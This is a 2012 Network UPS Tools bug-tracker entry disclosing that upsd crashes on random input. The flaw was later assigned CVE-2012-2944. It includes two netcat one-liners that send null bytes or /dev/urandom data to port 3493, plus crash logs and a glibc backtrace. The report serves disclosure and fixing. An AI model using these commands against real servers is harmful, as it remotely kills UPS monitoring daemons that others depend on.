[nut-Bugs][313636] upsd crashes if it receives random data

nut-bugs at alioth.debian.org nut-bugs at alioth.debian.org
Tue May 29 21:43:55 UTC 2012 

nut-Bugs item #313636, was changed at 29/05/2012 23:43 by Arnaud Quette
You can respond by visiting: 
https://alioth.debian.org/tracker/?func=detail&atid=411542&aid=313636&group_id=30602

Status: Open
Priority: 3
Submitted By: Sebastian Pohle (sepo-guest)
Assigned to: Nobody (None)
Summary: upsd crashes if it receives random data 
Category: Server
Group: None
Resolution: None


Initial Comment:
It is possible to remotely kill the upsd daemon if you send random data to the port it is listening on.

I 've tested it with Debian 6 (nut_2.4.3-1.1squeeze1) and Ubuntu 12.04 (nut-server_2.6.3-1ubuntu1).

Possible commands to reproduce this behavior are:

printf "\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\n" | netcat 127.0.0.1 3493

dd if=/dev/urandom count=10 | netcat 127.0.0.1 3493

The error message upsd prints on exit  is kind of random. Possible error message i've seen are:

root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
   0.000000     listen_add: added 127.0.0.1:3493
   0.000211     setuptcp: try to bind to 127.0.0.1 port 3493
   0.000353     listening on 127.0.0.1 port 3493
   0.000726     Connected to UPS [dummy1]: dummy-ups-dummy1
   0.001917     mainloop: polling 2 filedescriptors
   0.194902     mainloop: polling 2 filedescriptors
   0.195057     UPS [dummy1]: dump is done
   0.195117     mainloop: polling 2 filedescriptors
   0.781194     Connect from 127.0.0.1
   0.781240     mainloop: polling 3 filedescriptors
   0.781305     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781373     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781429     mainloop: polling 3 filedescriptors
   0.781477     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781522     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781560     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781599     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781634     mainloop: polling 3 filedescriptors
   0.781676     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781717     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781743     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781779     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781810     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   0.781852     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   0.781894     mainloop: polling 3 filedescriptors
Segmentation fault

root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
   0.000000     listen_add: added 127.0.0.1:3493
   0.000324     setuptcp: try to bind to 127.0.0.1 port 3493
   0.000586     listening on 127.0.0.1 port 3493
   0.001157     Connected to UPS [dummy1]: dummy-ups-dummy1
   0.002920     mainloop: polling 2 filedescriptors
   0.003184     mainloop: polling 2 filedescriptors
   0.003345     UPS [dummy1]: dump is done
   0.003471     mainloop: polling 2 filedescriptors
   1.889695     Connect from 127.0.0.1
   1.889836     mainloop: polling 3 filedescriptors
upsd: malloc.c:3575: mremap_chunk: Assertion `((size + offset) & (mp_.pagesize-1)) == 0' failed.
Aborted

root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
   0.000000     listen_add: added 127.0.0.1:3493
   0.000233     setuptcp: try to bind to 127.0.0.1 port 3493
   0.000405     listening on 127.0.0.1 port 3493
   0.000831     Connected to UPS [dummy1]: dummy-ups-dummy1
   0.001926     mainloop: polling 2 filedescriptors
   0.159276     mainloop: polling 2 filedescriptors
   0.159502     UPS [dummy1]: dump is done
   0.159626     mainloop: polling 2 filedescriptors
   2.160695     mainloop: no data available
   2.160832     mainloop: polling 2 filedescriptors
   4.162958     mainloop: no data available
   4.163092     mainloop: polling 2 filedescriptors
   6.096929     Connect from 127.0.0.1
   6.097012     Pinging UPS [dummy1]
   6.097075     mainloop: polling 3 filedescriptors
upsd: malloc.c:3097: sYSMALLOc: Assertion `(old_top == (((mbinptr) (((char *) &((av)->bins[((1) - 1) * 2])) - __builtin_offsetof (struct malloc_chunk, fd)))) && old_size == 0) || ((unsigned long) (old_size) >= (unsigned long)((((__builtin_offsetof (struct malloc_chunk, fd_nextsize))+((2 * (sizeof(size_t))) - 1)) & ~((2 * (sizeof(size_t))) - 1))) && ((old_top)->size & 0x1) && ((unsigned long)old_end & pagemask) == 0)' failed.
Aborted


root at server[/etc/nut]$ upsd -DDDD
Network UPS Tools upsd 2.4.3
   0.000000     listen_add: added 127.0.0.1:3493
   0.000218     setuptcp: try to bind to 127.0.0.1 port 3493
   0.000447     listening on 127.0.0.1 port 3493
   0.000906     Connected to UPS [dummy1]: dummy-ups-dummy1
   0.002018     mainloop: polling 2 filedescriptors
   0.002194     mainloop: polling 2 filedescriptors
   0.002262     UPS [dummy1]: dump is done
   0.002305     mainloop: polling 2 filedescriptors
   1.384295     Connect from 127.0.0.1
   1.384374     mainloop: polling 3 filedescriptors
   1.384616     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   1.384698     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   1.384893     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
   1.384980     write: [destfd=6] [len=20] [ERR UNKNOWN-COMMAND]
   1.385130     Sending error [UNKNOWN-COMMAND] to client 127.0.0.1
*** glibc detected *** upsd: realloc(): invalid next size: 0x09d46850 ***
======= Backtrace: =========
/lib/libc.so.6(+0x6b19a)[0xb768319a]
/lib/libc.so.6(+0x7093d)[0xb768893d]
/lib/libc.so.6(realloc+0xd7)[0xb7688c17]
/lib/libc.so.6(+0x5f8da)[0xb76778da]
/lib/libc.so.6(fclose+0xc9)[0xb76735b9]
/lib/libc.so.6(__vsyslog_chk+0x186)[0xb76dffe6]
/lib/libc.so.6(syslog+0x27)[0xb76e0457]
upsd[0x804edf4]
upsd[0x804f00f]
upsd[0x804a1d9]
upsd[0x804a436]
upsd[0x804ad08]
/lib/libc.so.6(__libc_start_main+0xe6)[0xb762ec96]
upsd[0x80496c1]
======= Memory map: ========
08048000-08053000 r-xp 00000000 08:01 140166     /sbin/upsd
08053000-08054000 rwxp 0000a000 08:01 140166     /sbin/upsd
09d3e000-09d5f000 rwxp 00000000 00:00 0          [heap]
b7400000-b7421000 rwxp 00000000 00:00 0
b7421000-b7500000 ---p 00000000 00:00 0
b758b000-b75a8000 r-xp 00000000 08:01 128283     /lib/libgcc_s.so.1
b75a8000-b75a9000 rwxp 0001c000 08:01 128283     /lib/libgcc_s.so.1
b75ad000-b75e2000 r-xs 00000000 08:06 2234       /var/cache/nscd/group
b75e2000-b7617000 r-xs 00000000 08:06 2233       /var/cache/nscd/passwd
b7617000-b7618000 rwxp 00000000 00:00 0
b7618000-b7756000 r-xp 00000000 08:01 140230     /lib/libc-2.11.3.so
b7756000-b7757000 ---p 0013e000 08:01 140230     /lib/libc-2.11.3.so
b7757000-b7759000 r-xp 0013e000 08:01 140230     /lib/libc-2.11.3.so
b7759000-b775a000 rwxp 00140000 08:01 140230     /lib/libc-2.11.3.so
b775a000-b775e000 rwxp 00000000 00:00 0
b775e000-b7765000 r-xp 00000000 08:01 129074     /lib/libwrap.so.0.7.6
b7765000-b7766000 rwxp 00007000 08:01 129074     /lib/libwrap.so.0.7.6
b7766000-b7779000 r-xp 00000000 08:01 129528     /lib/libnsl-2.11.3.so
b7779000-b777a000 r-xp 00012000 08:01 129528     /lib/libnsl-2.11.3.so
b777a000-b777b000 rwxp 00013000 08:01 129528     /lib/libnsl-2.11.3.so
b777b000-b777d000 rwxp 00000000 00:00 0
b7780000-b7783000 rwxp 00000000 00:00 0
b7783000-b779e000 r-xp 00000000 08:01 140223     /lib/ld-2.11.3.so
b779e000-b779f000 r-xp 0001b000 08:01 140223     /lib/ld-2.11.3.so
b779f000-b77a0000 rwxp 0001c000 08:01 140223     /lib/ld-2.11.3.so
bf9d8000-bf9f9000 rw-p 00000000 00:00 0          [stack]
ffffe000-fffff000 r-xp 00000000 00:00 0          [vdso]
Aborted




----------------------------------------------------------------------

>Comment By: Arnaud Quette (aquette)
Date: 29/05/2012 23:43

Message:
This has been assigned CVE-2012-2944 by MITRE

----------------------------------------------------------------------

You can respond by visiting: 
https://alioth.debian.org/tracker/?func=detail&atid=411542&aid=313636&group_id=30602

More information about the NUT-tracker mailing list